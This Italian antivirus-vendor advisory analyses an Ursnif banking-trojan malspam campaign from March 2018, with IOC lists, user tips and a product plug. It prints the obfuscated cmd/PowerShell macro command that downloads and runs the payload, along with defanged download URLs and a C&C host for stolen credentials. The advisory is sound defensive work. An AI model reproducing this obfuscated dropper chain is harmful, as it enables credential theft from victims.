Campagna di malspam che distribuiscono il malware Ursnif del 15 e 16 marzo 2018

Analisi da parte del C.R.A.M. (Centro di Ricerca Anti-Malware) di TG Soft della campagna di mail che diffonde il malware Ursnif in data 15 e 16 marzo 2018

Per gli invii massivi di mail fraudolente, vengono utilizzati i metodi di "ingegneria sociale" che sono sviluppati da persone/cyber-criminali per indurre la vittima ad aprire gli allegati infetti oppure a cliccare sui link presenti nel corpo del messaggio.
Se hai ricevuto un email sospetta, inviala al C.R.A.M. (Centro di Ricerca Anti-Malware): Come inviare mail sospette

INDICE

==> Campagna invio Ursnif

==> Come cercare di riconoscere una falsa mail

==> Come inviare mail sospette

==> Integra la protezione con Vir.IT Lite

==> Per i licenziatari in assistenza della versione PRO di Vir.IT eXplorer..

Campagna malware "Ursnif"

Famiglia malware: Ursnif
VirIT: Trojan.Win32.Ursnif.EQ, Trojan.DOC.Dropper.OP, Trojan.DOC.Dropper.OM, Trojan.Win32.Ursnif.ER

Descrizione:
La campagna di mail è partita il 15 marzo 2018 e sta continuando con una nuova ondata anche oggi 16 marzo.

Oggetto: [cambia in base alla mail che si riceve]

Buongiorno,

Vedi allegato e di confermare.

Come si diffonde:

Sfrutta gli account di posta elettronica configurati nel pc infettato, inviando finte risposte infette, a dei messaggi che sono stati GIA RICEVUTI in precedenza dalla vittima stessa.
Il corpo del messaggio è sempre lo stesso (visibile qui sopra in rosso), invece l'oggetto è diverso proprio perchè rispondendo a dei messaggi che la vittima ha ricevuto, nei giorni precedenti, varia in base ad essi.
L'allegato malevole presente nella mail è un file DOC che al suo interno contiene una MACRO AutoOpen che appena viene avviata scarica il malware e lo mette in esecuzione.

La macro AutoOpen prima esegue il file CMD.EXE passandogli come parametro la seguente stringa per eseguire PowerShell (campagna del 2018-03-15):

rhFXZhmvK RmVjRbXZszlijcamdjn lvLlVtdVjfQZil & %C^om^S^pEc%
%C^om^S^pEc% /V /c
set %EZmZEnibjGMZzfj%=ziJwsjlMVJAGr&&set %XRzNbKzkjXCilL%=p&&
set %zpripnwkZCZkaw%=ow&&
set %PQtilTRmLWujZMD%=GLVwzzR&&
set %OzDuOPYR%=!%XRzNbKzkjXCilL%!&&
set %LBGYnaEvmXjQqSu%=LSCmLPOTU&&
set %LEHbEfzlw%=er&&set %QqLYaunoLaRf%=!%zpripnwkZCZkaw%!&&
set %aPjAIMOMA%=s&&
set %iMOziKsPzidiudM%=bHLpvNh&&set %fWthJZh%=he&&
set %KBZYnMLwWK%=ll&&!%OzDuOPYR%!!
%QqLYaunoLaRf%!!%LEHbEfzlw%!!%aPjAIMOMA%!!%fWthJZh%!!%KBZYnMLwWK%!
"iex(( [rUnTimE.InTErOpSerVIceS.marShal]::
([RUnTIMe.IntEROpservICeS.maRsHAl].geTmEmbERS()[1].nAME).iNVOKe(
[RuNtIME.intEROpSerViCeS.mARShAL]::sECuResTriNgtOglOBalALLoCANSi($('76492d
1116743f0423413b16050a5345MgB8AFEAVwBVAG4AbgBiAEwAcQBjACsAbgBpAGwAe
[..]
AAyAGMANAA3ADUAYwBhADEANgBkADMANABlADIAOQBmADcAOQA4AGUAMAA1ADIA
NAA1ADUAYgAwADIAZABjAGMAYQAxAA=='| CoNvErTTO-SeCUrEstRIng -kEY 3,211,236,
164,37,68,140,210,255,95,208,148,140,46,48,73,228,255,71,236,131,41,146,87,71,
244,26,241,36,138,128,131)) ) ) )

Il cmd.exe manda in esecuzione uno script di Powershell:

powershell "iex(( [rUnTimE.InTErOpSerVIceS.marShal]::([RUnTIMe.IntEROpservICeS.maRsHAl].geTmEmbERS() [1].nAME).iNVOKe([RuNtIME.intEROpSerViCeS.mARShAL] [..]

Lo script di PowerShell fa il download dell'Ursnif dal sito http://idqjduwhasfhasdbwejeasdh[.]com/NOIT/testv.php?l=itmaker2.class e lo mette in esecuzione automatica.

Il malware dopo venir avviato crea una chiave in HKCU\Software\Microsoft\Windows\CurrentVersion\Run con [valore casuale] = %USERPROFILE%\APPDATA\ROAMING\MICROSOFT\[CARTELLA CASUALE]\NOMEFILE.EXE.
Il malware Ursnif fa un injection nel process EXPLORER.EXE

Esempi:
Nome: 5935890.exe
MD5: A54E54EF024C4D75107EC3B678D92DF3
Dimensione: 439.808 byte
Data di compilazione: 14/03/2018 20.39.36

Nella campagna del 16 marzo il Trojan Banker Ursnif viene scaricato dal sito http://krqweugmjasndasidhnjqwewq[.]com.

Note:

Il malware che viene scaricato fa parte della famiglia degli Ursnif, le sue peculiarità sono quelle di carpire password di accesso a siti importanti come possono essere home banking, posta, ftp etc.

IOC 2018-03-15:

File DOC MD5:
0337DE1801F201DF55C03674C54B2393
1D3E80D6D0BA768B247E827D021E3084
226865CAF1359EEA285001F08A5F3D32
2F6B36CDBE4B6CECEEF61FDCEF2F671F
32180B39C4E88802DEA68123C91F4155
460226754514FCDB2A416762A84D1D76
55B2149912C6B21DD426946C4CA53C3E
5E30725075A5034132CE8D10759E1CC9
63ED633F158DA9E8DD04BD729A81FD2E
6AA1D7674D797922EA21F97E0BF24187
721022C9D4F56E90131944C67274F513
95185EA3A812DDAC912C654A23035E1F
990BFE696B68B8B97AF4BE1A93538798
A2323973AD6C6D0C970811F3593CBD96
AE430EFE808A9187952B40C4623C6715
E120782EDF6D4E56B16C6B9905929479
ED97EE2D08454ED55047538ABD393544
FCC2686C5D100F2AE1BD6C8B6CFD50CC

File EXE MD5:
1D9C5F892638EC933FADB850FB3ED905
59EFD009A993E2E1011CEDAB876039B1
7A5ED1A6740ADC4992744639F151EF57
A54E54EF024C4D75107EC3B678D92DF3
B28F02E785B037ADED0AB6E01F464B7D
C9326AB8F896F4AB256123427652B71B
D5F0F93B68612F4BBF7671C77743E44A
EBAE6BE4F1A8696EBD51F5618A91CD98

URL:
http://idqjduwhasfhasdbwejeasdh[.]com/NOIT/testv.php?l=itmaker1.class
http://idqjduwhasfhasdbwejeasdh[.]com/NOIT/testv.php?l=itmaker2.class
http://idqjduwhasfhasdbwejeasdh[.]com/NOIT/testv.php?l=itmaker3.class
http://idqjduwhasfhasdbwejeasdh[.]com/NOIT/testv.php?l=itmaker4.class
http://idqjduwhasfhasdbwejeasdh[.]com/NOIT/testv.php?l=itmaker5.class
IP: 138.128.5.85

Server C&C (dove vengono inviati i dati esfiltrati come password e clipboard log):
https://ijquhgaspwqeasuahdqwe.net

IP server C&C: 138.128.5.96

IOC 2018-03-16 (in corso...):

File DOC MD5:
0D8C0A37B1B502873A0A915D0559135C
139103391187F1815002EE459CA18944
214670C43C9B1C7F0524DE99250CFB33
34FAF0E34C1F6A7AFA74CFC2466665C1
443A64E67A101511A1DD4D87010608A5
5BA5395AF7CE040A969CD535FF4CB867
5C17450FE11900385DAE2025FBF5AA7B
66577CE10DD7550D1DD54B6DFA409A4B
681682169C7B4DC4483C9B8F7F75AE1F
75F7DB9C8DBDC98BCB91D78FD435F8C2
8D0D64BADBEC02F341BE3A0B96EAEEEE
969293C0C6A1F7F265378C3A4E806610
9A8D25B71308168FD357B44E6507C2C9
9DF418676FA409B76DAA6D08EACC83D9
A154FFF1572D8FB67AD37491449DF487
A2626EB7F114E2B999AAF52ED3167B47
B3DDC826D65BDBAEF52EAC5524B95860
B82A0C08DF847470B21FA81EEEA2D918
C33DE58C333AFF4A107DAC6D6317D580
C4A209B5BE703675E8233A109AA3FEB0
C778CC39B58BCA11558074A9C3D600D4
D7F273320534BE032819F4A8AC5BB2D8
D96C3D656D7A6FB252344AB3553D082B
DCAA0663FFB4858479B9A2DAE3651A98
E614754DA733BFC4F41E2D191170242F

File EXE MD5:
A51E01AEA30DE8B559438D2CFC051AF0

URL:
http://krqweugmjasndasidhnjqwewq[.]com/ANY/itpros.class
http://krqweugmjasndasidhnjqwewq[.]com/ANY/itprosa.class
http://krqweugmjasndasidhnjqwewq[.]com/ANY/itprosb.class
http://krqweugmjasndasidhnjqwewq[.]com/ANY/itprosc.class
http://krqweugmjasndasidhnjqwewq[.]com/ANY/itprosd.class
http://krqweugmjasndasidhnjqwewq[.]com/NOIT/testv.php?l=itmaker1.class
http://krqweugmjasndasidhnjqwewq[.]com/NOIT/testv.php?l=itmaker2.class
http://krqweugmjasndasidhnjqwewq[.]com/NOIT/testv.php?l=itmaker3.class
http://krqweugmjasndasidhnjqwewq[.]com/NOIT/testv.php?l=itmaker4.class
http://krqweugmjasndasidhnjqwewq[.]com/NOIT/testv.php?l=itmaker5.class

Torna ad inizio pagina

Come cercare di riconoscere una falsa mail

L'esperienza ed il buon senso sono le prime armi per non rimanere vittima di questo tipo di truffe.
E' fondamentale un'attenta lettura della mail, in tutti i suoi elementi. Diffidare da subito di allegati in formato ZIP e, se possibile, NON abilitare l'esecuzione automatica delle macro. E' fortemente sconsigliato impostare l'esecuzione automatica delle macro poichè la semplice apertura di file Word ed Excel vedrà l'immediata esecuzione delle macro senza alcun alert preventivo.
Nel caso in cui si fosse stati infettati da un Banker, il consiglio da parte del C.R.A.M. di TG Soft è quello di prendere opportuni accorgimenti di sicurezza anche dopo la bonifica del/dei sistemi coinvolti come il cambio delle password più comunemente utilizzate nel web.
Nel caso in cui la postazione coinvolta fosse stata utilizzata per operazioni di home-banking è consigliato anche un accertamento con il proprio istituto di credito.

Come inviare e-mail sospette per l'analisi come possibili virus/malware/ransomware e/o tentativi di Phishing

L'invio di materiali da analizzare al Centro Ricerche Anti-Malware di TG Soft per l'analisi che è sempre e comunque gratuito può avvenire in tutta sicurezza in due modalità:

qualsiasi e-mail che sia da considerarsi sospetta può essere inviata direttamente dalla posta elettronica del ricevente scegliento come modalità di invio "INOLTRA come ALLEGATO" e inserendo nell'oggetto "Possibile Phishing da verificare" piuttosto che "Possibile Malware da verificare" alla mail lite@virit.com
salvare come file esterno al programma di posta elettronica utilizzato la mail da inviare al C.R.A.M. di TG Soft per l'analisi . Il file che ne risulterà dovrà essere inviato facendone l'Upload dalla pagina di INVIO File Sospetti (http://www.tgsoft.it/italy/file_sospetti.asp). Naturalmente per avere un feed-back rispetto al responso dell'analisi dei file infetti inviati sarà necessario indicare un indirizzo e-mail e sarà gradita una breve descrizione del motivo dell'invio del file (ad esempio: possiible/probabile phishing; possibile/probabile malware o altro).

Tutto questo per aiutare ad aiutarvi cercando di evitare che possiate incappare in furti di credenziali, virus/malware o ancor peggio Ransomware / Crypto-Malware di nuova generazione.

Torna ad inizio pagina

Integra la protezione del tuo PC/SERVER con Vir.IT eXplorer Lite

Se non doveste ancora utilizzare Vir.IT eXplorer PRO è consigliabile installare, ad integrazione dell'antivirus in uso per aumentare la sicurezza dei vostri computer, PC e SERVER indifferentemente, Vir.IT eXplorer Lite -FREE Edition-.

Vir.IT eXplorer Lite ha le seguenti caratteristiche peculiari:

liberamente utilizzabile sia in ambito privato sia in ambito aziendale con aggiornamenti Motore+Firme senza limitazioni temporali;
interoperabile con eventuali altri AntiVirus, AntiSpyware, AntiMalware o Internet Security già presenti su PC e SERVER, consigliato l'utilizzo ad integrazione dell'AntiVirus già in uso poichè non conflitta nè rallenta il sistema ma permette di aumentare sensibilmente la sicurezza in termini di identificazione e bonifica dei file infetti;
identifica e, in moltissimi casi, anche rimuove la maggior parte dei virus/malware realmente circolanti o, in alternativa, ne permette l'invio al C.R.A.M. Centro Ricerche Anti-Malware di TG Soft per l'analisi e l'aggiornamento di Vir.IT eXplorer per l'univoca identificazione e la corretta rimozione;
grazie alla tecnologia Intrusione Detection, resa disponibile anche nella versione Lite di Vir.IT eXplorer, il software è in grado di segnalare eventuali virus/malware di nuova generazione che si siano posti in esecuzione automatica e procedere all'invio dei file segnalati al C.R.A.M. di TG Soft.
Procedi al download di Vir.IT eXplorer Lite dalla pagina ufficiale di distribuzione del sito di TG Soft.

Per i licenziatari in assistenza della versione PRO di Vir.IT eXplorer...

Per i possessori di Vir.IT eXplorer PRO è anche possibile contattare gratuitamente il supporto tecnico telefonico di TG Soft le cui modalità sono consultabili alla pagina del supporto CLIENTI.

C.R.A.M.
Centro Ricerche Anti-Malware di TG Soft

Torna ad inizio pagina

Ogni informazioni pubblicata sul nostro sito può essere utilizzata e pubblicata su altri siti internet, blog, forum, facebook e/o in ogni altra forma sia in modalità cartacea che elettronica a patto che venga sempre e comunque citata la fonte esplicitamente “Fonte: C.R.A.M. by TG Soft www.tgsoft.it” con link cliccabile all'informativa e/o pagina web originale da cui sono stati estrapolati contenuti testuali, spunti e/o immagini.

Sarà gradito nel caso di utilizzo dell'informativa del C.R.A.M. by TG Soft www.tgsoft.it nella relazione di articoli di sintesi il riconoscimento/ringraziamento di seguito “Si ringrazia il Centro Ricerche Anti-Malware C.R.A.M. by TG Soft di cui segnaliamo il link diretto all'informativa originale:[link diretto cliccabile]”